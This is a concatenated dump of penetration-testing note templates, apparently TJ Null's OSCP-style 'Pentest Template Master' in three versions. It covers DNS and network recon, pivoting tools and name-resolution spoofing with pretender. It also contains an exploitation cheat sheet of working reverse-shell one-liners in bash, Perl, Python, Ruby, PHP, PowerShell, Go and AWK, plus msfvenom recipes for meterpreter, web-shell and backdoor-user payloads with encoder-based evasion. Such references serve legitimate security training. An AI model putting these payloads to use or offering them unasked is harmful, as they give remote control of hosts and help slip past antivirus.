dnsrecon -d www.example.com -a 6 | - dnsrecon -d www.example.com -t axfr 7 | - dnsrecon -d 8 | - dnsrecon -d www.example.com -D -t brt 9 | 10 | Dig: 11 | 12 | - dig www.example.com + short 13 | - dig www.example.com MX 14 | - dig www.example.com NS 15 | - dig www.example.com> SOA 16 | - dig www.example.com ANY +noall +answer 17 | - dig -x www.example.com 18 | - dig -4 www.example.com (For IPv4) 19 | - dig -6 www.example.com (For IPv6) 20 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 21 | - dig -t AXFR www.example.com 22 | 23 | Dnsenum Enumeration: 24 | 25 | - dnsenum --dnsserver 172.21.0.0 -enum intranet.megacorpone.xx 26 | - dnsenum --dnsserver 172.21.0.0 -enum management.megacorpone.xx 27 | - dnsenum --dnsserver 172.21.0.0 -enum www.megacorpone.xx 28 | 29 | dnsX Enumeration: 30 | - dnsx -l domains.txt -resp -a -aaaa -cname -mx -ns -soa -txt 31 | - dnsx -silent -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt 32 | 33 | Using with subfinder: 34 | - subfinder -silent -d megacorpone.com | dnsx -silent 35 | - subfinder -silent -d megacorpone.com | dnsx -silent -a -resp 36 | - subfinder -silent -d megacorpone.com | dnsx -silent -a -resp-only 37 | - subfinder -silent -d megacorpone.com | dnsx -silent -cname -resp 38 | - subfinder -silent -d megacorpone.com | dnsx -silent -asn 39 | 40 | 41 | Nmap Enumeration: 42 | ``` 43 | $ ls -lh /usr/share/nmap/scripts/ | grep dns 44 | -rw-r--r-- 1 root root 1499 Oct 12 09:29 broadcast-dns-service-discovery.nse 45 | -rw-r--r-- 1 root root 5329 Oct 12 09:29 dns-blacklist.nse 46 | -rw-r--r-- 1 root root 10100 Oct 12 09:29 dns-brute.nse 47 | -rw-r--r-- 1 root root 6639 Oct 12 09:29 dns-cache-snoop.nse 48 | -rw-r--r-- 1 root root 15152 Oct 12 09:29 dns-check-zone.nse 49 | -rw-r--r-- 1 root root 14826 Oct 12 09:29 dns-client-subnet-scan.nse 50 | -rw-r--r-- 1 root root 10168 Oct 12 09:29 dns-fuzz.nse 51 | -rw-r--r-- 1 root root 3803 Oct 12 09:29 dns-ip6-arpa-scan.nse 52 | -rw-r--r-- 1 root root 12702 Oct 12 09:29 dns-nsec3-enum.nse 53 | -rw-r--r-- 1 root root 10580 Oct 12 09:29 dns-nsec-enum.nse 54 | -rw-r--r-- 1 root root 3441 Oct 12 09:29 dns-nsid.nse 55 | -rw-r--r-- 1 root root 4364 Oct 12 09:29 dns-random-srcport.nse 56 | -rw-r--r-- 1 root root 4363 Oct 12 09:29 dns-random-txid.nse 57 | -rw-r--r-- 1 root root 1456 Oct 12 09:29 dns-recursion.nse 58 | -rw-r--r-- 1 root root 2195 Oct 12 09:29 dns-service-discovery.nse 59 | -rw-r--r-- 1 root root 5679 Oct 12 09:29 dns-srv-enum.nse 60 | -rw-r--r-- 1 root root 5765 Oct 12 09:29 dns-update.nse 61 | -rw-r--r-- 1 root root 2123 Oct 12 09:29 dns-zeustracker.nse 62 | -rw-r--r-- 1 root root 26574 Oct 12 09:29 dns-zone-transfer.nse 63 | -rw-r--r-- 1 root root 3910 Oct 12 09:29 fcrdns.nse 64 | ``` 65 | -nmap x.x.x.x -v -p 53 --script=exampleScript1.nse,exampleScript2.nse 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | 4 | ## tcpdump: 5 | 6 | - tcpdump -i eth0 7 | - tcpdump -c -i eth0 8 | - tcpdump -A -i eth0 9 | - tcpdump -w 0001.pcap -i eth0 10 | - tcpdump -r 0001.pcap 11 | - tcpdump -n -i eth0 12 | - tcpdump -i eth0 port 22 13 | - tcpdump -i eth0 -src 172.21.10.X 14 | - tcpdump -i eth0 -dst 172.21.10.X 15 | 16 | Other tools: 17 | 18 | Tshark (Command Line Wireshark) 19 | Wireshark 20 | 21 | 22 | ## Network Scanning 23 | 24 | NetDiscover (ARP Scanning): 25 | - netdiscover -i eth0 26 | - netdiscover -r 172.21.10.0/24 27 | 28 | Nmap: 29 | 30 | - nmap -sn 172.21.10.0/24 31 | - nmap -sn 172.21.10.1-253 32 | - nmap -sn 172.21.10.* 33 | 34 | Nbtscan: 35 | - nbtscan -r 172.21.1.0/24 36 | 37 | Linux Ping Sweep (Bash) 38 | 39 | - for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done 40 | 41 | Windows Ping Sweep (Run on Windows System) 42 | 43 | - for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up. 44 | 45 | 46 | 47 | ## Host Scanning 48 | 49 | Nmap: 50 | 51 | - nmap -sC -sV 172.21.0.0 52 | - nmap -Pn -sC -sV -p- 172.21.0.0 53 | - nmap -sV -Pn 172.21.0.0 54 | - nmap -T4 -sC -sV 172.21.0.0 55 | - nmap -A 172.21.0.0 56 | 57 | Nmap Stealth: 58 | - nmap -sS -sC -sV 172.21.0.0 59 | - nmap -sS -p- 172.21.0.0 60 | 61 | 62 | UDP Scan: 63 | - nmap -sS -sU -Pn -sV 172.21.0.0 64 | - nmap -sU -A --top-ports=20 --version-all 65 | - nmap -sU -A -p 53,67,68,161,162 --version-all 66 | - unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 67 | 68 | 69 | IPv6 Scan: 70 | 71 | Nmap Scripts: 72 | 73 | Location: /usr/share/nmap/scripts/ 74 | 75 | - nmap --scripts vuln,safe,discovery -oN results.txt target-ip 76 | 77 | Scans through Socks proxy: 78 | 79 | - nmap --proxies socks4://proxy-ip:8080 target-ip 80 | 81 | DNSRecon: 82 | 83 | - dnsrecon -d www.example.com -a 84 | - dnsrecon -d www.example.com -t axfr 85 | - dnsrecon -d 86 | - dnsrecon -d www.example.com -D -t brt 87 | 88 | Dig: 89 | 90 | - dig www.example.com + short 91 | - dig www.example.com MX 92 | - dig www.example.com NS 93 | - dig www.example.com> SOA 94 | - dig www.example.com ANY +noall +answer 95 | - dig -x www.example.com 96 | - dig -4 www.example.com (For IPv4) 97 | - dig -6 www.example.com (For IPv6) 98 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 99 | - dig -t AXFR www.example.com 100 | 101 | Sublis3r: 102 | 103 | - Sublist3r -d www.example.com 104 | - Sublist3r -v -d www.example.com -p 80,443 105 | 106 | OWASP AMASS: 107 | 108 | - amass enum -d www.example.com 109 | - amass intel -whois -d www.example.com 110 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 111 | - amass intel -ipv4 -whois -d www.example.com 112 | - amass intel -ipv6 -whois -d www.example.com 113 | 114 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/General Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT 10 | 11 | ## Changelog: 12 | 13 | v1.0: Original Template 14 | 15 | v2.0 The first chapter 16 | 17 | 2. Enumeration 18 | - Added an FTP Notebook to include notes for that identified service 19 | - Added more content in Active Directory 20 | - Web has a subnotebook to include any content from the changelog.txt file 21 | - Fixed the gobuster oneliners to match with the recent changes from the tool 22 | 23 | 3. Exploitation 24 | - Added some custom options for searchsploit 25 | 26 | 4. Post Exploitation 27 | - Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 28 | - Created a sub notebook to include the output from automated priv esc scripts that are used. 29 | - Included tools, tips, and resources in all sections for priv esc 30 | 31 | v3.0 Major Refactoring Overhaul 32 | - Added sub notebooks (Recon Targets, Enumeration Targets, Exploitation Targets, Post Exploitation Targets). Makes it easier to organize all of the notes you have for assessing the targets instead of having them cluttered in your other notes. 33 | - Broke down the recon notes to include a discovery and a host scan sub notebooks 34 | - Moved Pivot/Tunneling into the Recon Notes Section. [Pivoting/Tunneling](../Pentest%20Template%20Master%203.0/1.%20Recon%20Notes/Pivoting_Tunneling.md) 35 | - Moved Reporting into High Value Information/Reporting SubNotebook 36 | - New section for impacket ntlmrelayx [Impacket NtlmRelayX](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Impacket%20NtlmRelayX.md) 37 | - New section for pretender [Pretender](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Pretender.md) 38 | - New section or clean up with responder [Responder](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Responder.md) 39 | - New section including how to use villian [Villian Cheatsheet](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/Villian%20Cheatsheet.md) 40 | - New section for editable services [General Notes](../Pentest%20Template%20Master%203.0/7.%20Post%20Exploitation/Editable%20Services/General%20Notes.md) 41 | - Added a new PWK V2/V3 OSCP Report Template [OSCP Report Template V2](../Pentest%20Template%20Master%203.0/9.%20High%20Value%20Information_Reporting/Reporting/OSCP%20Report%20Template%20V2.md) 42 | - Added a PowerShell ISO oneliner if you want to launch your payloads through an ISO [General Notes](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/General%20Notes.md) 43 | 44 | 45 | Shoutout to TheGetch (https://github.com/TheGetch) for sharing some of his notes and giving me some inspiration to the hiearchy he has. 46 | 47 | If you want to see his current methodolgy you can find it here: https://github.com/TheGetch/Penetration-Testing-Methodology -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md: -------------------------------------------------------------------------------- 1 | ## Pre-requisites for runninging exploits 2 | 3 | - Check the version of the operating system. 4 | - Check the software version. 5 | - Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc). 6 | - If you have an exploit, is there a Metasploit Module for it? 7 | 8 | 9 | ## Default Credentials 10 | 11 | - https://cirt.net/passwords 12 | - https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials 13 | 14 | ## Reverse Shells 15 | 16 | Bash: 17 | 18 | - bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1 19 | 20 | Perl: 21 | 22 | ``` 23 | perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 24 | ``` 25 | 26 | Python: 27 | 28 | - python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 29 | 30 | IPv6: 31 | 32 | - python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 33 | 34 | Ruby: 35 | 36 | - ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 37 | - ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 38 | 39 | 40 | PHP: 41 | 42 | Pentest Monkey Reverse Shell for PHP: 43 | In Kali: 44 | 45 | /usr/share/webshells/php/php-reverse-shell.php 46 | 47 | Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell 48 | 49 | - php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 50 | 51 | Powershell: 52 | 53 | ``` 54 | $callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close() 55 | ``` 56 | 57 | Golang: 58 | 59 | - echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go 60 | 61 | AWK: 62 | 63 | - awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null 64 | 65 | 66 | Other Reverse Shell: 67 | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 68 | 69 | 70 | ## Other Resources 71 | 72 | - Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md: -------------------------------------------------------------------------------- 1 | # Source: https://github.com/RedTeamPentesting/pretender 2 | 3 | # Installation 4 | 5 | ## In Kali: 6 | - git clone https://github.com/RedTeamPentesting/pretender 7 | - go build 8 | - pretender --help 9 | 10 | ## Using Pretender: 11 | - pretender -i eth0 12 | - pretender -i eth0 --dry (Only logs incoming queries and does not answer any of them) 13 | - pretender -i eth0 --dry --no-ra # without router advertisements 14 | 15 | ## Options to disabled certain attacks: 16 | 17 | --no-dhcp-dns 18 | --no-lnr 19 | --no-mdns 20 | --no-llmnr 21 | --no-netbios 22 | --no-ra 23 | 24 | ## Tips 25 | 26 | - Make sure to enable IPv6 support in `ntlmrelayx.py` with the `-6` flag 27 | - Pretender can be configured to stop after a certain time period for situations 28 | where it cannot be aborted manually (`--stop-after` and 29 | `main.vendorStopAfter`) 30 | - Host info lookup (which relies on the ARP table, IP neighbours and reverse 31 | lookups) can be disabled with `--no-host-info` or `main.vendorNoHostInfo` 32 | - If you are not sure which interface to choose (especially on Windows), list 33 | all interfaces with names and addresses using `--interfaces` 34 | - If you want to exclude hosts from local name resolution spoofing, make sure to 35 | also exclude their IPv6 addresses or use 36 | `--no-ipv6-lnr`/`main.vendorNoIPv6LNR` 37 | - DHCPv6 messages usually contain a FQDN option (which can also sometimes 38 | contain a hostname which is not a FQDN). This option is used to filter out 39 | messages by hostname (`--spoof-for`/`--dont-spoof-for`). You can decide what 40 | to do with DHCPv6 messages without FQDN option by setting or omitting 41 | `--ignore-nofqdn` 42 | - Depending on the build configuration, either the operating system resolver 43 | (`CGO_ENABLED=1`) or a Go implementation (`CGO_ENABLED=0`) is used. This can 44 | be important for host info collection because the OS resolver may support 45 | local name resolution and the Go implementation does not, unless a stub 46 | resolver is used. 47 | - The host info functionality is currently only available for Windows and Linux. 48 | - A custom MAC address vendor list can be compiled into the binary by replacing 49 | the default list `hostinfo/mac-vendors.txt`. Only lines with MAC prefixes in 50 | the following format are recognized: `FF:FF:FFVendorIDVendor` (the 51 | MAC prefix length can be arbitrary). 52 | - If you only want to perform Kerberos relaying you can specify `--no-lnr` and 53 | `--spoof-types SOA` to ignore any queries that are unrelated to the attack. 54 | - When conducting a Kerberos relay attack where `krbrelayx.py` runs on a 55 | different host than pretender (relay IPv4 address points to different host 56 | that runs `krbrelayx.py`), the host running `krbrelayx.py` will also need to 57 | run pretender in order to receive and deny the Dynamic Update query sent to 58 | the relay IPv4 address. 59 | - By default, in order to limit disruption during a DHCPv6 DNS Takeover, the 60 | option `--delegate-ignored-to ` can be used to delegate ignored 61 | queries to a legitimate DNS server. 62 | - The option `--dry-with-dhcp` can be combined with `--delegate-ignored-to` to 63 | monitor the name resolution queries in the network without disruption. 64 | --- -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md: -------------------------------------------------------------------------------- 1 | # SSH Tunneling 2 | 3 | 4 | Note: Target must have SSH running for there service 5 | 6 | 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 7 | 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 8 | 3. Add the following line into the config: Socks5 127.0.0.1 9 | 4. Run commands through the tunnel: proxychains 10 | 11 | ## SShuttle 12 | 13 | In Kali 14 | 15 | Source: https://github.com/sshuttle/sshuttle 16 | 17 | - sshuttle -r root@172.21.0.0 10.2.2.0/24 18 | 19 | 20 | # Meterpreter 21 | 22 | Use only if you have a meterpreter shell and you need to pivot to another network. 23 | 24 | ## Portfwd 25 | 26 | - meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 27 | 28 | ## Autoroute 29 | In Metasploit 30 | 1. use post/multi/manage/autoroute 31 | ``` 32 | msf5 post(multi/manage/autoroute) > options 33 | 34 | Module options (post/multi/manage/autoroute): 35 | 36 | Name Current Setting Required Description 37 | ---- --------------- -------- ----------- 38 | CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 39 | NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 40 | SESSION yes The session to run this module on. 41 | SUBNET no Subnet (IPv4, for example, 10.10.10.0) 42 | 43 | msf5 post(multi/manage/autoroute) > 44 | ``` 45 | 2. set session 46 | 3. run 47 | 48 | ## Metasploit Socks Proxy 49 | 50 | 1 auxiliary/server/socks4a normal No Socks4a Proxy Server 51 | 2 auxiliary/server/socks5 normal No Socks5 Proxy Server 52 | 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection 53 | 54 | # Ncat 55 | 56 | ## Http Proxy 57 | - ncat -vv --listen 3128 --proxy-type http 58 | 59 | ## Port Forwarder 60 | 1. mknod pivot p 61 | 2. nc -l -p < port to listen on> 0 1>pivot 62 | 63 | # Cntlm 64 | 65 | apt install cntlm 66 | 67 | 1. cntlm -u username@breakme.local -I proxy 68 | 2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 69 | 3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" 70 | 71 | # netsh port forwarding 72 | - netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 73 | - netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 74 | 75 | 76 | # Proxy Binaries for Windows 77 | Windows 10 has SSH (Thanks WSL!) 78 | plink.exe (In Kali) 79 | 80 | # Other Tools: 81 | - ssf: https://github.com/securesocketfunneling/ssf 82 | - rpivot: https://github.com/klsecservices/rpivot 83 | - hans (ICMP Tunneling): http://code.gerade.org/hans/ 84 | - Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/ 85 | - Dnscat2: https://github.com/iagox86/dnscat2 86 | - Chisel: https://github.com/jpillora/chisel 87 | - httptunnel: In Kali apt install httptunnel 88 | 89 | # Other Resources: 90 | 91 | - https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html 92 | - https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ 93 | - 94 | 95 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md: -------------------------------------------------------------------------------- 1 | ## Creating a payload 2 | 3 | - msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] 4 | 5 | To view list of payloads: msfvenom -l payloads 6 | To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options 7 | 8 | ## Creating a payload with encoding 9 | 10 | - msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile 11 | 12 | ## Creating a payload using a template 13 | 14 | - msfvenom -p [payload] -x [template] -f [formattype] > outputfile 15 | 16 | ## Listening for MSfvenom Payloads: 17 | 18 | ``` 19 | msf5>use exploit/multi/handler 20 | msf5>set payload windows/meterpreter/reverse_tcp 21 | msf5>set lhost 22 | msf5>set lport 23 | msf5> set ExitOnSession false 24 | msf5>exploit -j 25 | ``` 26 | 27 | ## Windows Payloads 28 | 29 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 30 | - msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe 31 | - msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe 32 | - msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 33 | - msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 34 | 35 | ## Linux Payloads 36 | 37 | - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf 38 | - msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 39 | - msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 40 | - msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 41 | 42 | Add a user in windows with msfvenom: 43 | 44 | - msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 45 | 46 | ## Web Payloads 47 | 48 | PHP 49 | 50 | - msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 51 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 52 | 53 | ASP 54 | 55 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 56 | 57 | JSP 58 | 59 | - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 60 | 61 | WAR 62 | 63 | - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 64 | 65 | ## Scripting Payloads 66 | 67 | Python 68 | 69 | - msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 70 | 71 | Bash 72 | 73 | - msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 74 | 75 | Perl 76 | 77 | - msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 78 | 79 | 80 | Creating an Msfvenom Payload with an encoder while removing bad charecters: 81 | 82 | - msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D" 83 | 84 | ## Resources: 85 | 86 | - https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md: -------------------------------------------------------------------------------- 1 | ## Creating a payload 2 | 3 | - msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] 4 | 5 | To view list of payloads: msfvenom -l payloads 6 | To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options 7 | 8 | ## Creating a payload with encoding 9 | 10 | - msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile 11 | 12 | ## Creating a payload using a template 13 | 14 | - msfvenom -p [payload] -x [template] -f [formattype] > outputfile 15 | 16 | ## Listening for MSfvenom Payloads: 17 | 18 | ``` 19 | msf5>use exploit/multi/handler 20 | msf5>set payload windows/meterpreter/reverse_tcp 21 | msf5>set lhost 22 | msf5>set lport 23 | msf5> set ExitOnSession false 24 | msf5>exploit -j 25 | ``` 26 | 27 | ## Windows Payloads 28 | 29 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 30 | - msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe 31 | - msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe 32 | - msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 33 | - msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 34 | 35 | ## Linux Payloads 36 | 37 | - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf 38 | - msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 39 | - msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 40 | - msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 41 | 42 | Add a user in windows with msfvenom: 43 | 44 | - msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 45 | 46 | ## Web Payloads 47 | 48 | PHP 49 | 50 | - msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 51 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 52 | 53 | ASP 54 | 55 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 56 | 57 | JSP 58 | 59 | - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 60 | 61 | WAR 62 | 63 | - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 64 | 65 | ## Scripting Payloads 66 | 67 | Python 68 | 69 | - msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 70 | 71 | Bash 72 | 73 | - msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 74 | 75 | Perl 76 | 77 | - msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 78 | 79 | 80 | Creating an Msfvenom Payload with an encoder while removing bad charecters: 81 | 82 | - msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D" 83 | 84 | ## Resources: 85 | 86 | - https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md: -------------------------------------------------------------------------------- 1 | ## Creating a payload 2 | 3 | - msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] 4 | 5 | To view list of payloads: msfvenom -l payloads 6 | To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options 7 | 8 | ## Creating a payload with encoding 9 | 10 | - msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile 11 | 12 | ## Creating a payload using a template 13 | 14 | - msfvenom -p [payload] -x [template] -f [formattype] > outputfile 15 | 16 | ## Listening for MSfvenom Payloads: 17 | 18 | ``` 19 | msf5>use exploit/multi/handler 20 | msf5>set payload windows/meterpreter/reverse_tcp 21 | msf5>set lhost 22 | msf5>set lport 23 | msf5> set ExitOnSession false 24 | msf5>exploit -j 25 | ``` 26 | 27 | ## Windows Payloads 28 | 29 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 30 | - msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe 31 | - msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe 32 | - msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 33 | - msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 34 | 35 | ## Linux Payloads 36 | 37 | - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf 38 | - msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 39 | - msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 40 | - msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 41 | 42 | Add a user in windows with msfvenom: 43 | 44 | - msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 45 | 46 | ## Web Payloads 47 | 48 | PHP 49 | 50 | - msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 51 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 52 | 53 | ASP 54 | 55 | - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 56 | 57 | JSP 58 | 59 | - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 60 | 61 | WAR 62 | 63 | - msfvenom -p 